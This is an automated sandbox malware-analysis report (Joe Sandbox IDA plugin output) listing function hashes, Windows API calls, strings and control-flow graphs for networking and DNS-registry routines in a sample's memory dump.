                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ae54713731c98928e5f059d39d399807d4a3c74db0b33c210fdba6a65de3bff
                                          • Instruction ID: 307e758f396a32cba780b1821eb916494def4f2c3e44c3028b8b5fc9bb20359e
                                          • Opcode Fuzzy Hash: 2ae54713731c98928e5f059d39d399807d4a3c74db0b33c210fdba6a65de3bff
                                          • Instruction Fuzzy Hash: 7591F2F162D34A4BDB358E28C8947BBB2D9EFD4320F148B2CE899431D4EB719C61D681
                                          Function 002EA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,002D712E,?,?,?,00001001,00000000), ref: 002EA90D
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: recvfrom
                                          • String ID:
                                          • API String ID: 846543921-0
                                          • Opcode ID: 820aa42a623494aa2d25697273e08922d441791626c991ab4d5ae4bff7827e06
                                          • Instruction ID: ea9d8efb07a36cf73842b1c7769ee00cb155e09592dfca892ce40aef5eee0335
                                          • Opcode Fuzzy Hash: 820aa42a623494aa2d25697273e08922d441791626c991ab4d5ae4bff7827e06
                                          • Instruction Fuzzy Hash: 13F06D75128348AFD2109E02DC84D6BBBEDEFC9764F05455DF948132118270BE10CAB2
                                          Function 002DA440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 002DAA19
                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 002DAA4C
                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 002DAA97
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 002DAAE9
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 002DAB30
                                          • RegCloseKey.KERNELBASE(?), ref: 002DAB6A
                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 002DAB82
                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 002DAC46
                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 002DAD0A
                                          • RegEnumKeyExA.KERNELBASE ref: 002DAD8D
                                          • RegCloseKey.KERNELBASE(?), ref: 002DADD9
                                          • RegEnumKeyExA.KERNELBASE ref: 002DAE08
                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 002DAE2A
                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 002DAE54
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 002DAF63
                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 002DAFB2
                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 002DB072
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: QueryValue$Open$CloseEnum
                                          • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                          • API String ID: 4217438148-1047472027
                                          • Opcode ID: 2d0676f475c194e7fafb925b788143ba10df479853f07f3b89d43c07ae4463b1
                                          • Instruction ID: a8cc8c54469051019affce4ec5b909ec291cf444b2b0da8c82138b31d35acb41
                                          • Opcode Fuzzy Hash: 2d0676f475c194e7fafb925b788143ba10df479853f07f3b89d43c07ae4463b1
                                          • Instruction Fuzzy Hash: 0972CFB1618302ABE7109F24CC81F6B7BE8AF85704F145829F9859B391E775EC54CBA3
                                          Function 0025A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                          Download Yara Rule
                                          APIs
                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0025A832
                                          Strings
                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0025AD0A
                                          • Could not set TCP_NODELAY: %s, xrefs: 0025A871
                                          • Trying %s:%d..., xrefs: 0025A7C2, 0025A7DE
                                          • Local port: %hu, xrefs: 0025AF28
                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 0025AE1F
                                          • @, xrefs: 0025AC42
                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0025A6CE
                                          • Trying [%s]:%d..., xrefs: 0025A689
                                          • Local Interface %s is ip %s using address family %i, xrefs: 0025AE60
                                          • cf-socket.c, xrefs: 0025A5CD, 0025A735
                                          • Bind to local port %d failed, trying next, xrefs: 0025AFE5
                                          • bind failed with errno %d: %s, xrefs: 0025B080
                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 0025ADAC
                                          • @, xrefs: 0025A8F4
                                          • cf_socket_open() -> %d, fd=%d, xrefs: 0025A796
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: setsockopt
                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                          • API String ID: 3981526788-2373386790
                                          • Opcode ID: 88193f78b5f6bcd17a1288ed4c725298d6af85aa707f9ce14c74d1838680de46
                                          • Instruction ID: 19bc5ccccca5d36ee467abb15e1499931ede5efc16c5294b8c31784be8904a51
                                          • Opcode Fuzzy Hash: 88193f78b5f6bcd17a1288ed4c725298d6af85aa707f9ce14c74d1838680de46
                                          • Instruction Fuzzy Hash: 78622670514342ABE720CF14C846BABB7F4BF95315F044A29FD8897292E771E869CB93
                                          Function 002E9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 944 2e9740-2e975b 945 2e975d-2e9768 call 2e78a0 944->945 946 2e9780-2e9782 944->946 954 2e976e-2e9770 945->954 955 2e99bb-2e99c0 945->955 948 2e9788-2e97a0 call 5a8e00 call 2e78a0 946->948 949 2e9914-2e994e call 5a8b70 RegOpenKeyExA 946->949 948->955 960 2e97a6-2e97c5 948->960 958 2e995a-2e9992 RegQueryValueExA RegCloseKey call 5a8b98 949->958 959 2e9950-2e9955 949->959 954->960 961 2e9772-2e977e 954->961 962 2e9a0c-2e9a15 955->962 974 2e9997-2e99b5 call 2e78a0 958->974 959->962 967 2e9827-2e9833 960->967 968 2e97c7-2e97e0 960->968 961->948 970 2e985f-2e9872 call 2e5ca0 967->970 971 2e9835-2e985c call 2de2b0 * 2 967->971 972 2e97f6-2e9809 968->972 973 2e97e2-2e97f3 call 5a8b50 968->973 985 2e9878-2e987d call 2e77b0 970->985 986 2e99f0 970->986 971->970 972->967 984 2e980b-2e9810 972->984 973->972 974->955 974->960 984->967 989 2e9812-2e9822 984->989 993 2e9882-2e9889 985->993 988 2e99f5-2e99fb call 2e5d00 986->988 999 2e99fe-2e9a09 988->999 989->962 993->988 994 2e988f-2e989b call 2d4fe0 993->994 994->986 1002 2e98a1-2e98c3 call 5a8b50 call 2e78a0 994->1002 999->962 1008 2e98c9-2e98db call 2de2d0 1002->1008 1009 2e99c2-2e99ed call 2de2b0 * 2 1002->1009 1008->1009 1014 2e98e1-2e98f0 call 2de2d0 1008->1014 1009->986 1014->1009 1020 2e98f6-2e9905 call 2e63f0 1014->1020 1024 2e990b-2e990f 1020->1024 1025 2e9f66-2e9f7f call 2e5d00 1020->1025 1026 2e9a3f-2e9a5a call 2e6740 call 2e63f0 1024->1026 1025->999 1026->1025 1033 2e9a60-2e9a6e call 2e6d60 1026->1033 1036 2e9a1f-2e9a39 call 2e6840 call 2e63f0 1033->1036 1037 2e9a70-2e9a94 call 2e6200 call 2e67e0 call 2e6320 1033->1037 1036->1025 1036->1026 1048 2e9a16-2e9a19 1037->1048 1049 2e9a96-2e9ac6 call 2dd120 1037->1049 1048->1036 1050 2e9fc1 1048->1050 1055 2e9ac8-2e9adb call 2dd120 1049->1055 1056 2e9ae1-2e9af7 call 2dd190 1049->1056 1053 2e9fc5-2e9ffd call 2e5d00 call 2de2b0 * 2 1050->1053 1053->999 1055->1036 1055->1056 1056->1036 1063 2e9afd-2e9b09 call 2d4fe0 1056->1063 1063->1050 1068 2e9b0f-2e9b29 call 2de730 1063->1068 1073 2e9b2f-2e9b3a call 2e78a0 1068->1073 1074 2e9f84-2e9f88 1068->1074 1073->1074 1081 2e9b40-2e9b54 call 2de760 1073->1081 1076 2e9f95-2e9f99 1074->1076 1078 2e9f9b-2e9f9e 1076->1078 1079 2e9fa0-2e9fb6 call 2debf0 * 2 1076->1079 1078->1050 1078->1079 1091 2e9fb7-2e9fbe 1079->1091 1087 2e9f8a-2e9f92 1081->1087 1088 2e9b5a-2e9b6e call 2de730 1081->1088 1087->1076 1094 2e9b8c-2e9b97 call 2e63f0 1088->1094 1095 2e9b70-2ea004 1088->1095 1091->1050 1103 2e9b9d-2e9bbf call 2e6740 call 2e63f0 1094->1103 1104 2e9c9a-2e9cab call 2dea00 1094->1104 1100 2ea015-2ea01d 1095->1100 1101 2ea01f-2ea022 1100->1101 1102 2ea024-2ea045 call 2debf0 * 2 1100->1102 1101->1053 1101->1102 1102->1053 1103->1104 1121 2e9bc5-2e9bda call 2e6d60 1103->1121 1113 2e9f31-2e9f35 1104->1113 1114 2e9cb1-2e9ccd call 2dea00 call 2de960 1104->1114 1116 2e9f37-2e9f3a 1113->1116 1117 2e9f40-2e9f61 call 2debf0 * 2 1113->1117 1130 2e9ccf 1114->1130 1131 2e9cfd-2e9d0e call 2de960 1114->1131 1116->1036 1116->1117 1117->1036 1121->1104 1133 2e9be0-2e9bf4 call 2e6200 call 2e67e0 1121->1133 1134 2e9cd1-2e9cec call 2de9f0 call 2de4a0 1130->1134 1142 2e9d53-2e9d55 1131->1142 1143 2e9d10 1131->1143 1133->1104 1149 2e9bfa-2e9c0b call 2e6320 1133->1149 1155 2e9cee-2e9cfb call 2de9d0 1134->1155 1156 2e9d47-2e9d51 1134->1156 1146 2e9e69-2e9e8e call 2dea40 call 2de440 1142->1146 1147 2e9d12-2e9d2d call 2de9f0 call 2de4a0 1143->1147 1172 2e9e94-2e9eaa call 2de3c0 1146->1172 1173 2e9e90-2e9e92 1146->1173 1169 2e9d2f-2e9d3c call 2de9d0 1147->1169 1170 2e9d5a-2e9d6f call 2de960 1147->1170 1164 2e9b75-2e9b86 call 2dea00 1149->1164 1165 2e9c11-2e9c1c call 2e7b70 1149->1165 1155->1131 1155->1134 1161 2e9dca-2e9ddb call 2de960 1156->1161 1182 2e9e2e-2e9e36 1161->1182 1183 2e9ddd-2e9ddf 1161->1183 1164->1094 1185 2e9f2d 1164->1185 1165->1094 1189 2e9c22-2e9c33 call 2de960 1165->1189 1169->1147 1198 2e9d3e-2e9d42 1169->1198 1201 2e9dc2 1170->1201 1202 2e9d71-2e9d73 1170->1202 1194 2ea04a-2ea04c 1172->1194 1195 2e9eb0-2e9eb1 1172->1195 1179 2e9eb3-2e9ec4 call 2de9c0 1173->1179 1179->1036 1204 2e9eca-2e9ed0 1179->1204 1191 2e9e3d-2e9e5b call 2debf0 * 2 1182->1191 1192 2e9e38-2e9e3b 1182->1192 1186 2e9e06-2e9e21 call 2de9f0 call 2de4a0 1183->1186 1185->1113 1227 2e9e23-2e9e2c call 2deac0 1186->1227 1228 2e9de1-2e9dee call 2dec80 1186->1228 1214 2e9c66-2e9c75 call 2e78a0 1189->1214 1215 2e9c35 1189->1215 1193 2e9e5e-2e9e67 1191->1193 1192->1191 1192->1193 1193->1146 1193->1179 1207 2ea04e-2ea051 1194->1207 1208 2ea057-2ea070 call 2debf0 * 2 1194->1208 1195->1179 1198->1146 1201->1161 1209 2e9d9a-2e9db5 call 2de9f0 call 2de4a0 1202->1209 1212 2e9ee5-2e9ef2 call 2de9f0 1204->1212 1207->1050 1207->1208 1208->1091 1242 2e9db7-2e9dc0 call 2deac0 1209->1242 1243 2e9d75-2e9d82 call 2dec80 1209->1243 1212->1036 1236 2e9ef8-2e9f0e call 2de440 1212->1236 1232 2e9c7b-2e9c8f call 2de7c0 1214->1232 1233 2ea011 1214->1233 1222 2e9c37-2e9c51 call 2de9f0 1215->1222 1222->1094 1258 2e9c57-2e9c64 call 2de9d0 1222->1258 1246 2e9df1-2e9e04 call 2de960 1227->1246 1228->1246 1232->1094 1253 2e9c95-2ea00e 1232->1253 1233->1100 1256 2e9ed2-2e9edf call 2de9e0 1236->1256 1257 2e9f10-2e9f26 call 2de3c0 1236->1257 1259 2e9d85-2e9d98 call 2de960 1242->1259 1243->1259 1246->1182 1246->1186 1253->1233 1256->1036 1256->1212 1257->1256 1270 2e9f28 1257->1270 1258->1214 1258->1222 1259->1201 1259->1209 1270->1050
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 002E9946
                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 002E9974
                                          • RegCloseKey.KERNELBASE(?), ref: 002E998B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                          • API String ID: 3677997916-4129964100
                                          • Opcode ID: 68e4a4981e4ee0228c0cb45bd89dacf3afb91cbc84f342f8537aee244f4012bb
                                          • Instruction ID: 649de85b5d754df3a61470565922090673c4f7a4b7381679300341fb80af461e
                                          • Opcode Fuzzy Hash: 68e4a4981e4ee0228c0cb45bd89dacf3afb91cbc84f342f8537aee244f4012bb
                                          • Instruction Fuzzy Hash: 2A32D7B19642426BEB10AF22EC42A5B76D4AF54308F494436FD099A363F731ED74CB93
                                          Function 00258B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1365 258b50-258b69 1366 258be6 1365->1366 1367 258b6b-258b74 1365->1367 1368 258be9 1366->1368 1369 258b76-258b8d 1367->1369 1370 258beb-258bf2 1367->1370 1368->1370 1371 258bf3-258bfe call 25a550 1369->1371 1372 258b8f-258ba7 call 236e40 1369->1372 1377 258de4-258def 1371->1377 1378 258c04-258c08 1371->1378 1379 258bad-258baf 1372->1379 1380 258cd9-258d16 SleepEx 1372->1380 1383 258df5-258e19 call 25a150 1377->1383 1384 258e8c-258e95 1377->1384 1381 258dbd-258dc3 1378->1381 1382 258c0e-258c1d 1378->1382 1385 258bb5-258bb9 1379->1385 1386 258ca6-258cb0 1379->1386 1395 258d22 1380->1395 1396 258d18-258d20 1380->1396 1381->1368 1390 258c35-258c48 call 25a150 1382->1390 1391 258c1f-258c34 connect 1382->1391 1420 258e88 1383->1420 1421 258e1b-258e26 1383->1421 1388 258e97-258e9c 1384->1388 1389 258f00-258f06 1384->1389 1385->1370 1394 258bbb-258bc2 1385->1394 1386->1380 1392 258cb2-258cb8 1386->1392 1397 258edf-258eef call 2278b0 1388->1397 1398 258e9e-258eb6 call 232a00 1388->1398 1389->1370 1419 258c4d-258c4f 1390->1419 1391->1390 1399 258ddc-258dde 1392->1399 1400 258cbe-258cd4 call 25b180 1392->1400 1394->1370 1402 258bc4-258bcc 1394->1402 1406 258d26-258d39 1395->1406 1396->1406 1423 258ef2-258efc 1397->1423 1398->1397 1425 258eb8-258edd call 233410 * 2 1398->1425 1399->1368 1399->1377 1400->1377 1403 258bd4-258bda 1402->1403 1404 258bce-258bd2 1402->1404 1403->1370 1411 258bdc-258be1 1403->1411 1404->1370 1404->1403 1414 258d43-258d61 call 23d8c0 call 25a150 1406->1414 1415 258d3b-258d3d 1406->1415 1422 258dac-258db8 call 2650a0 1411->1422 1444 258d66-258d74 1414->1444 1415->1399 1415->1414 1426 258c51-258c58 1419->1426 1427 258c8e-258c93 1419->1427 1420->1384 1428 258e2e-258e85 call 23d090 call 264fd0 1421->1428 1429 258e28-258e2c 1421->1429 1422->1370 1423->1389 1425->1423 1426->1427 1434 258c5a-258c62 1426->1434 1437 258c99-258c9f 1427->1437 1438 258dc8-258dd9 call 25b100 1427->1438 1428->1420 1429->1420 1429->1428 1440 258c64-258c68 1434->1440 1441 258c6a-258c70 1434->1441 1437->1386 1438->1399 1440->1427 1440->1441 1441->1427 1446 258c72-258c8b call 2650a0 1441->1446 1444->1370 1449 258d7a-258d81 1444->1449 1446->1427 1449->1370 1453 258d87-258d8f 1449->1453 1454 258d91-258d95 1453->1454 1455 258d9b-258da1 1453->1455 1454->1370 1454->1455 1455->1370 1458 258da7 1455->1458 1458->1422
                                          APIs
                                          • connect.WS2_32(?,?,00000001), ref: 00258C2F
                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 00258CF3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: Sleepconnect
                                          • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                          • API String ID: 238548546-879669977
                                          • Opcode ID: e1d0f1cee82d7344c47591cd8ee75bd0d30d60987b810b782a585751ada9278c
                                          • Instruction ID: 27c1746146cc3310fe17d5e9837dfa35934d2658c1dac159801868a98f96fce7
                                          • Opcode Fuzzy Hash: e1d0f1cee82d7344c47591cd8ee75bd0d30d60987b810b782a585751ada9278c
                                          • Instruction Fuzzy Hash: 75B1C070614706AFE710CF24C885B66B7E4AF45319F048529FC59AB2D2DBB0EC6CCB65
                                          Function 00222F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1459 222f17-222f8c call 6c2270 call 6c2660 1464 2231c9-2231cd 1459->1464 1465 2231d3-2231d6 1464->1465 1466 222f91-222ff4 call 221619 RegOpenKeyExA 1464->1466 1469 2231c5 1466->1469 1470 222ffa-22300b 1466->1470 1469->1464 1471 22315c-2231ac RegEnumKeyExA 1470->1471 1472 2231b2-2231c2 1471->1472 1473 223010-223083 call 221619 RegOpenKeyExA 1471->1473 1472->1469 1477 223089-2230d4 RegQueryValueExA 1473->1477 1478 22314e-223152 1473->1478 1479 2230d6-223137 call 6c2540 call 6c25d0 call 6c2660 call 6c2470 call 6c2660 call 6c09d0 1477->1479 1480 22313b-22314b RegCloseKey 1477->1480 1478->1471 1479->1480 1480->1478
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
